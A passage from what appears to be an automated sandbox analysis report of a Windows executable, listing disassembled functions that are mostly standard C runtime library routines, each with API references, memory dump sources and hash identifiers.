                                                                                                                        • _memmove.LIBCMT ref: 0040C3D3
                                                                                                                        • ___pctype_func.LIBCMT ref: 0040C3E4
                                                                                                                        • ____lc_locale_name_func.LIBCMT ref: 0040C3F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                        • String ID: B
                                                                                                                        • API String ID: 1321936363-3806887055
                                                                                                                        • Opcode ID: a87319a5170ce802def29d0fc22c9df1dd79b762334036f69ce4bbb537025eeb
                                                                                                                        • Instruction ID: 3000733e9fba5eca00f5c1d353237309ea9df9ed4da175b0931c95f52ec26c71
                                                                                                                        • Opcode Fuzzy Hash: a87319a5170ce802def29d0fc22c9df1dd79b762334036f69ce4bbb537025eeb
                                                                                                                        • Instruction Fuzzy Hash: B3F0C2755047019BD7207FA6D842B977BD89F04754F10C43FF698D76A2DB78E8808B89
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00411053 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004163C9: __getptd_noexit.LIBCMT ref: 004163CA
                                                                                                                        • EncodePointer.KERNEL32(00000000), ref: 0041107D
                                                                                                                        • _CallSETranslator.LIBCMT ref: 004110B3
                                                                                                                        • _GetRangeOfTrysToCheck.LIBCMT ref: 004110DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CallCheckEncodePointerRangeTranslatorTrys__getptd_noexit
                                                                                                                        • String ID: MOC$RCC$ZS
                                                                                                                        • API String ID: 3337196757-2129068654
                                                                                                                        • Opcode ID: a18941b9a9a7d2f89688fb2d102dc6d8e522c664d440ee5d25321fbffed3a3ba
                                                                                                                        • Instruction ID: b0a86199b773dd500d54aac0547a615f8cc7fd901e3e5eb0994ec731192b32a4
                                                                                                                        • Opcode Fuzzy Hash: a18941b9a9a7d2f89688fb2d102dc6d8e522c664d440ee5d25321fbffed3a3ba
                                                                                                                        • Instruction Fuzzy Hash: 0B416A32500249AFDF21CF44C881EEEBBA6FF48314F19819AFA1457261C379AD91CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00416503 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __init_pointers.LIBCMT ref: 00416503
                                                                                                                          • Part of subcall function 004153E1: EncodePointer.KERNEL32(00000000,?,00416508,0041068C,0042E4C8,00000014), ref: 004153E4
                                                                                                                          • Part of subcall function 004153E1: __initp_misc_winsig.LIBCMT ref: 004153FF
                                                                                                                        • __mtinitlocks.LIBCMT ref: 00416508
                                                                                                                        • __mtterm.LIBCMT ref: 00416511
                                                                                                                        • __calloc_crt.LIBCMT ref: 00416536
                                                                                                                        • __initptd.LIBCMT ref: 00416558
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041655F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentEncodePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1469070506-0
                                                                                                                        • Opcode ID: 230950c743a8e0d294ef02d5d58ab4ea8ef5b4225b169417a7e73c4916ecec56
                                                                                                                        • Instruction ID: b154347d85d495ea19d7033877c085535a8166e006bad3d9ea4269fccca8eb89
                                                                                                                        • Opcode Fuzzy Hash: 230950c743a8e0d294ef02d5d58ab4ea8ef5b4225b169417a7e73c4916ecec56
                                                                                                                        • Instruction Fuzzy Hash: DEF0F0325097112AE6347B367D027CB2BA28B41B38B22062FF424C41E6FFACD4C1819C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004068D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406250: _localeconv.LIBCMT ref: 00406257
                                                                                                                          • Part of subcall function 00406170: __Getcvt.LIBCPMT ref: 0040617F
                                                                                                                        • _Maklocchr.LIBCPMTD ref: 004069DF
                                                                                                                        • _Maklocchr.LIBCPMTD ref: 004069F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Maklocchr$Getcvt_localeconv
                                                                                                                        • String ID: PdB`@$`@
                                                                                                                        • API String ID: 4220647775-2941669558
                                                                                                                        • Opcode ID: 98609bdb16613f20f6d6d6463da8d270b2eedd82cf8c78b4577562e24e0e1804
                                                                                                                        • Instruction ID: 534d5f74b59b053b1341c35075627e1c8f2461e40e2f8ad959eae66e21ecd0b9
                                                                                                                        • Opcode Fuzzy Hash: 98609bdb16613f20f6d6d6463da8d270b2eedd82cf8c78b4577562e24e0e1804
                                                                                                                        • Instruction Fuzzy Hash: 6C4171B5A00208ABCB04EF91C951BAFB775EF84714F20812EE9067B3C1D7759A41CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041B2AC Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0041B2B8
                                                                                                                          • Part of subcall function 004122B3: __FF_MSGBANNER.LIBCMT ref: 004122CA
                                                                                                                          • Part of subcall function 004122B3: __NMSG_WRITE.LIBCMT ref: 004122D1
                                                                                                                          • Part of subcall function 004122B3: RtlAllocateHeap.NTDLL(00500000,00000000,00000001,00000000,00000000,00000000,?,00412111,?,?,?,00000000,?,0041085D,00000018,0042E4E8), ref: 004122F6
                                                                                                                        • _free.LIBCMT ref: 0041B2CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020059152-0
                                                                                                                        • Opcode ID: a795e9e31375394ebc980fec7878f460e182967e85213140fa55d0200dea7141
                                                                                                                        • Instruction ID: b2389dc75f3e599ccbf8f53cbf2b5fa3c824b862e293ae698bebec6b36274e7e
                                                                                                                        • Opcode Fuzzy Hash: a795e9e31375394ebc980fec7878f460e182967e85213140fa55d0200dea7141
                                                                                                                        • Instruction Fuzzy Hash: 5F11C132904619ABCB216B75AC097DF3798DF04364B10456BFE15DA290DB7C89E086DC
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040D78A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427045233-3916222277
                                                                                                                        • Opcode ID: ad9f29b0787348e55b470ae4f5b85b912d51ed206bd02ae5a77dd0ad3a5b9d7d
                                                                                                                        • Instruction ID: 2e860a05d43275ab0c514d4b4700c01f53cc27874e5ecff2fd4257cdeb013678
                                                                                                                        • Opcode Fuzzy Hash: ad9f29b0787348e55b470ae4f5b85b912d51ed206bd02ae5a77dd0ad3a5b9d7d
                                                                                                                        • Instruction Fuzzy Hash: 77514A76D00219AFDF14DFE4D490AEEBBB5BF08314F14402BE551B7680D734A949CBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00421062 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 856254489-711371036
                                                                                                                        • Opcode ID: e0678e921978aa89001a5f604fc50081054cfe1b70a77d93c730e9d1556a5cff
                                                                                                                        • Instruction ID: 003bf2413bdcaddfa9f669a4f07945a4db877d4baaec2d20db0c75a1d14693f4
                                                                                                                        • Opcode Fuzzy Hash: e0678e921978aa89001a5f604fc50081054cfe1b70a77d93c730e9d1556a5cff
                                                                                                                        • Instruction Fuzzy Hash: 3601C43130156566EB24AA59FC42FDB33DC9F10358FC0842BFE04D6691E638DA81829D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B850 Relevance: 6.2, APIs: 4, Instructions: 203COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6e5a7006adbe88e47f35a1270829b68af61863e52c9ae9ca15de4c8df6752eec
                                                                                                                        • Instruction ID: de8468eaa11d20b13063f0c6b0f67f3ad5d1ff502551d401f741e945a8f2dbe2
                                                                                                                        • Opcode Fuzzy Hash: 6e5a7006adbe88e47f35a1270829b68af61863e52c9ae9ca15de4c8df6752eec
                                                                                                                        • Instruction Fuzzy Hash: 6C713CB1D10108ABCB08EBE5D8919EEB7B4EF54304F14417EE512772C2EB396A45CBD9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004112BB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1721217611-0
                                                                                                                        • Opcode ID: 8f2bff75d3b11db863f7dcf48fec64c625789c86fa4ea781d2b8666185d0d3c7
                                                                                                                        • Instruction ID: 1df0a30ad1e2b38c0c7414e910cb68a38849e61c5bf8b03e10b53f6aeca323ec
                                                                                                                        • Opcode Fuzzy Hash: 8f2bff75d3b11db863f7dcf48fec64c625789c86fa4ea781d2b8666185d0d3c7
                                                                                                                        • Instruction Fuzzy Hash: C041F9352043069EEB249F26D891BE773E89F41B14F24441FFA419AAF1EF39D8C0D658
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040DC3C Relevance: 6.1, APIs: 4, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3__fgetc_ungetc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1616942180-0
                                                                                                                        • Opcode ID: 1c98a55f3a0520616e69a832f020cf01ca363d9bd75fc0f2798cb0c83272c4a6
                                                                                                                        • Instruction ID: 2259ba2c0c698b25d86b7ad31dcaaef8a66effe5bd8f4a2344dd75f81d976f9c
                                                                                                                        • Opcode Fuzzy Hash: 1c98a55f3a0520616e69a832f020cf01ca363d9bd75fc0f2798cb0c83272c4a6
                                                                                                                        • Instruction Fuzzy Hash: FC512A71D0421A9BDF14DBA4C4819EEB7B4FF05314F54053BE501B72C1D739A989CBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406C00 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::ios_base::good$char_traits
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1812610724-0
                                                                                                                        • Opcode ID: 9771474a63bb4fbfe1fa104586451b705b6653b93acc51803443e073b8d80a99
                                                                                                                        • Instruction ID: 71a895779c97389833f86b94cd0136fdda514eb48a4a9ff86550163ce42ca92e
                                                                                                                        • Opcode Fuzzy Hash: 9771474a63bb4fbfe1fa104586451b705b6653b93acc51803443e073b8d80a99
                                                                                                                        • Instruction Fuzzy Hash: 88515174A001059BCB04EB55C891ABFB376EF84308F14816EE9126B3D2DB3DE916DB99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040C5D4 Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Getcvt.LIBCPMT ref: 0040C62C
                                                                                                                        • MultiByteToWideChar.KERNEL32(0040279A,00000009,?,00000002,00000000,00000000), ref: 0040C67A
                                                                                                                        • MultiByteToWideChar.KERNEL32(0040279A,00000009,00000001,8BFC458B,00000000,00000000), ref: 0040C6F0
                                                                                                                        • MultiByteToWideChar.KERNEL32(0040279A,00000009,00000001,00000001,00000000,00000000), ref: 0040C718
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$Getcvt
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3195005509-0
                                                                                                                        • Opcode ID: 0f1f0b25d81ee2a53a8ee2e0c38776df63226aafb4272f8f94c4cbc3e4c769fe
                                                                                                                        • Instruction ID: 01f6558478512ec0a2ff66ac5b0755c9a032ab749ddaa272f02c20999c60780b
                                                                                                                        • Opcode Fuzzy Hash: 0f1f0b25d81ee2a53a8ee2e0c38776df63226aafb4272f8f94c4cbc3e4c769fe
                                                                                                                        • Instruction Fuzzy Hash: AA41E131600305EFDB318FA4C880B6B7BB9AF41310F188A3AF812AB2D0C77A9C55DB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040F2C0 Relevance: 6.1, APIs: 4, Instructions: 136COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2782032738-0
                                                                                                                        • Opcode ID: 92679eee998903cf601309f19ccb9918b6022e7eb14d0328aba595b67849e62c
                                                                                                                        • Instruction ID: 7a8755caad81f2db01b7e2bd36ba0f777c159d19d9bbe935306dcdfa438ef2b1
                                                                                                                        • Opcode Fuzzy Hash: 92679eee998903cf601309f19ccb9918b6022e7eb14d0328aba595b67849e62c
                                                                                                                        • Instruction Fuzzy Hash: 2841D5317007069BDB389EA9C8805AF7BA5EF44360B24817FEC15E7AC0E779DD498B48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040AA20 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: char_traits
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1158913984-0
                                                                                                                        • Opcode ID: bb1450c6d387189cdf19a91489086ce3ad792392aff285e2d5891ac6c3f3807e
                                                                                                                        • Instruction ID: 5a832e8ae5fe1b37038ff4431d082a517e90252d5f3543d992b1b139b8c6a7b2
                                                                                                                        • Opcode Fuzzy Hash: bb1450c6d387189cdf19a91489086ce3ad792392aff285e2d5891ac6c3f3807e
                                                                                                                        • Instruction Fuzzy Hash: BB3132B6D00209ABCB04EBA5D8415EE77756F90304F08417FE5017B2C3EB39AA55C79A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041C398 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041C3CE
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 0041C3FC
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0042269E,?,00BFBBEF,00000003), ref: 0041C42A
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0042269E,?,00BFBBEF,00000003), ref: 0041C460
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 5e45edd823c0c7cd4cb7d2b4a5ab3bd4dd7520ee7adbde6a6301d1be9256c8d5
                                                                                                                        • Instruction ID: 547c718a83519e7bbd56740d29af18943614e665b35a83bd7c06524ab9a347f1
                                                                                                                        • Opcode Fuzzy Hash: 5e45edd823c0c7cd4cb7d2b4a5ab3bd4dd7520ee7adbde6a6301d1be9256c8d5
                                                                                                                        • Instruction Fuzzy Hash: DC31E13168425AAFDB218F65CC85BFF7BA5FF41310F15802AE864872A0D738D891DB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B1D0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: fpos$__fseeki64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 905458392-0
                                                                                                                        • Opcode ID: ce14f9c48814d36a01bb4ca592e1ad0b77224641f50ffecd11dae9b3ce04de45
                                                                                                                        • Instruction ID: 06df2cf7a36b54989bd073a937d37f2656ac00511c9069a7b1527f11cf2f6f4f
                                                                                                                        • Opcode Fuzzy Hash: ce14f9c48814d36a01bb4ca592e1ad0b77224641f50ffecd11dae9b3ce04de45
                                                                                                                        • Instruction Fuzzy Hash: 3D310E71A00109EBCB08DF99C995DAEB7B5EF48304F1481ADE905A7291E734AF41CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00410BEE Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00410C05
                                                                                                                          • Part of subcall function 0041122D: ___AdjustPointer.LIBCMT ref: 00411276
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00410C1C
                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00410C2E
                                                                                                                        • CallCatchBlock.LIBCMT ref: 00410C52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                        • String ID:
